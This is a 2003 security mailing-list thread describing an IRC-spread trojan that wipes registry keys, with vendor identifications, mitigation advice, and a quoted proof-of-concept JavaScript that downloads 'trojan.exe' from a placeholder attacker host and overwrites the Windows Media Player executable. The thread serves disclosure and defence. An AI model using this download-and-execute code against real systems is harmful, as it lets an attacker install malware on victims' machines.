In-Reply-To: <20031027174719.11875.qmail (at) sf-www1-symnsj.securityfocus (dot) com [email concealed]>

This trojan is now identified :

IRC.Trojan.Fgt [Symantec] IRC-Worm.Fagot [Kaspersky], Fagot [F-Secure]

Type: Trojan Horse

Infection Length: 156,672 bytes

IRC.Trojan.Fgt is a downloaded file that disables firewall and security software,it works by sending messages via IRC chat, trying to get people to click on a web link, which would download "britney.jpg" from www.angelfire.com. It deletes critical system files and changes the Internet Explorer home page to a pornographic page.

The website which was responsible for distributing this threat is no longer available. So the worm doesn't work any more (this version).

More : http://securityresponse.symantec.com/avcenter/venc/data/irc.trojan.fgt.h
tml

Regards.

K-OTik Staff /// http://www.k-otik.com

>From: K-OTiK Security <Special-Alerts (at) k-otik (dot) com [email concealed]>

>To: bugtraq (at) securityfocus (dot) com [email concealed]

>Subject: Re: a dangerous fast spreading (yet simple) trojan horse.

>

>it uses a well known IE unpatched vulnerability discovered by jelmer on Sep 11 2003 "Windows Media Player & Internet Explorer File Download and Execution" :

>

>http://www.k-otik.com/WMPLAYER-TEST/

>http://www.securityfocus.com/archive/1/337285/2003-09-10/2003-09-16/2

>http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm

>

>To prevent this exploit : Disable Active Scripting

>

>Regards.

>K-Otik Staff /// http://www.k-otik.com

>

>----------------------- POC -------------------------

> var x = new ActiveXObject("Microsoft.XMLHTTP");

> x.Open("GET", "http://attacker/trojan.exe",0);

> x.Send();

>

> var s = new ActiveXObject("ADODB.Stream");

> s.Mode = 3;

> s.Type = 1;

> s.Open();

> s.Write(x.responseBody);

>

> s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

> location.href = "mms://";

>-----------------------------------------------------

>

>>From: "Gadi Evron" <ge (at) egotistical.reprehensible (dot) net [email concealed]>

>>Subject: a dangerous fast spreading (yet simple) trojan horse.

>>Date: Mon, 27 Oct 2003 16:52:57 -0800

>>

>>I usually do not email about "new" trojan horses unless they have

>>something "special" about them, for there are a lot of them coming out

>>non-stop. However, with this one,

>>Although quite simple, is very destructive and spreading at incredible

>>speed.

>>

>>The trojan horse spreads by people going to different URL's to download

>>a *.jpg (started with britney.jpg).

>>

>>The jpeg is actually an HTML file, and when the web browser receives it,

>>it thinks that it is a server error message for the file not existing,

>>and loads the page.

>>

>>In the page we find a javascript line, that using hex encoding in an

>>attempt to hide what it does, downloads patch.exe and replaces

>>mplayer.exe with the new file.

>>patch.exe connects to the mIRC DDE server, causing mIRC to spam, and

>>then it start ruining the system's registry. Starting to delete keys at

>>root and enumerating from there, one at a time.

>>What I signify, and forgive my language, as an "Hump and dump" trojan

>>horse.

>>

>>This reminds me of the first patch.exe trojan horse, that was purely a

>>destructive file - back in 95/96.

>>

>>I would also like to commend angelfire for shutting down the first web

>>page this appeared on very quickly. They always respond to abuse in a

>>timely manner. The geocities page is still up last time I checked.

>>

>>Not very complicated, but interesting, and very dangerous.

>>

>> Gadi Evron (i.e. ge),

>> ge (at) linuxbox (dot) org. [email concealed]

>>

>>--------

>>gevron (at) netvision.net (dot) il [email concealed]

>>PGP Key: 2048/2048 (Size) 0x2D3D6741 (ID).

>>Fingerprint: 0EB3 00BC 974B 3C2B 336D 6486 ECA5 2D0D 2D3D 6741.

>>

>>

>>

>

[ reply ]